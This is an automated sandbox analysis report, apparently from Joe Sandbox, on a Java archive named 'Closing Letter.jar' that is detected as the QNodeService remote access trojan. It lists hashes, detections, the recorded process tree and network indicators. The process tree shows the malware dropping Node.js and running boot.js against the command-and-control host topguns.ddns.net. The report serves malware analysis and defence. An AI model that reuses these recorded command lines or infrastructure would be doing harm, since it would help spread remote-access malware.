Play interactive tour

Edit tour

Analysis Report Closing Letter.jar

Overview

General Information

Sample Name:	Closing Letter.jar
Analysis ID:	302849
MD5:	831b760ab36e475c75edf3995058c835
SHA1:	6cd5e4ea8b9c1649d4e0e4f2a69ef77456f5048a
SHA256:	397a2d60c33dfdcd5cc56ae22b22989f31c154ced6547d9f1487ae02a1dc30db
Tags:	jarQNodeServiceRAT
Most interesting Screenshot:

Detection

QNodeService

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected QNodeService

Exploit detected, runtime environment starts unknown processes

Uses dynamic DNS services

Yara detected Allatori_JAR_Obfuscator

Abnormal high CPU Usage

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to query CPU information (cpuid)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches a Java Jar file from a suspicious file location

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

java.exe (PID: 4240 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' MD5: 28733BA8C383E865338638DF5196E6FE)

icacls.exe (PID: 6992 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

javaw.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)

node.exe (PID: 4968 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)

conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

node.exe (PID: 6028 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)

node.exe (PID: 5328 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Closing Letter.jar	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\28fda05a.tmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: java.exe PID: 4240	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: javaw.exe PID: 6900	JoeSecurity_QNodeService	Yara detected QNodeService	Joe Security
Process Memory Space: javaw.exe PID: 6900	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js	Jump to behavior

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes

Show sources

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

Jump to behavior

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: topguns.ddns.net

Source: Joe Sandbox View	IP Address: 193.228.91.12 193.228.91.12
Source: Joe Sandbox View	IP Address: 104.20.23.46 104.20.23.46

Source: Joe Sandbox View

ASN Name: REBECCAHOSTUS REBECCAHOSTUS

Source: Joe Sandbox View

JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7

Source: unknown

DNS traffic detected: queries for: nodejs.org

Source: java.exe, 00000002.00000002.709063871.000000000A9C0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918652198.000000000A1BD000.00000004.00000001.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: java.exe, 00000002.00000002.709099121.000000000A9D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000007.00000002.936544095.000000001696B000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.926957064.00000000150E6000.00000004.00000001.sdmp	String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0#
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: javaw.exe, 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.allatori.com
Source: java.exe, 00000002.00000002.720781521.00000000164D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.931142684.0000000015C88000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: node.exe, 00000013.00000002.951812248.00007FF64CE07000.00000002.00020000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
Source: java.exe, 00000002.00000002.709137697.000000000AA07000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: https://nodejs.org/dist/v14.12.0/
Source: javaw.exe, 00000007.00000002.936026786.0000000016840000.00000004.00000001.sdmp	String found in binary or memory: https://nodejs.org/dist/v14.12.0/3FCA97F
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

Process Stats: CPU usage > 98%

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_032DEC17	2_2_032DEC17
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC06584	7_3_0AC06584
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC06584	7_3_0AC06584
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC06584	7_3_0AC06584
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC06584	7_3_0AC06584

Source: classification engine

Classification label: mal60.troj.expl.evad.winJAR@15/1028@4/3

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'
Source: unknown	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp
Source: unknown	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: unknown	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net	Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Data Obfuscation:

Yara detected Allatori_JAR_Obfuscator

Show sources

Source: Yara match	File source: Closing Letter.jar, type: SAMPLE
Source: Yara match	File source: 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: java.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 6900, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\28fda05a.tmp, type: DROPPED

Source: Java tracing

Executes: java.lang.ProcessBuilder(java.util.List) on c:\program files (x86)\java\jre1.8.0_211\bin\javaw.exe -javaagent:"c:\users\user\appdata\local\temp\jartracer.jar" -jar c:\users\user\appdata\local\temp\28fda05a.tmp

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323D877 push 00000000h; mov dword ptr [esp], esp	2_2_0323D8A1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323BB27 push 00000000h; mov dword ptr [esp], esp	2_2_0323BB4D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323B377 push 00000000h; mov dword ptr [esp], esp	2_2_0323B39D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323B907 push 00000000h; mov dword ptr [esp], esp	2_2_0323B92D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323A1CA push ecx; ret	2_2_0323A1DA
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323A1DB push ecx; ret	2_2_0323A1E5
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323D860 push 00000000h; mov dword ptr [esp], esp	2_2_0323D8A1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_03242D44 push eax; retf	2_2_03242D45
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_0323C437 push 00000000h; mov dword ptr [esp], esp	2_2_0323C45D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_2_032D9751 push cs; retf	2_2_032D9771
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC03B42 push eax; iretd	7_3_0AC03B69
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC03B42 push eax; iretd	7_3_0AC03B69
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02957 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02957 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC00427 push eax; iretd	7_3_0AC00441
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC00427 push eax; iretd	7_3_0AC00441
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02A30 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02A30 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC03B42 push eax; iretd	7_3_0AC03B69
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC03B42 push eax; iretd	7_3_0AC03B69
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02957 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02957 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC00427 push eax; iretd	7_3_0AC00441
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC00427 push eax; iretd	7_3_0AC00441
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02A30 push eax; iretd	7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Code function: 7_3_0AC02A30 push eax; iretd	7_3_0AC02A29

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

File created: C:\Users\user\node-v14.12.0-win-x64.tmp326058425756\node-v14.12.0-win-x64\node.exe

Jump to dropped file

Source: unknown

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js	Jump to behavior

Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp	Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp	Binary or memory string: \|[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\node-v14.12.0-win-x64\node.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Code function: 2_2_03230632 LdrInitializeThunk,

2_2_03230632

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Memory protected: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net	Jump to behavior

Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

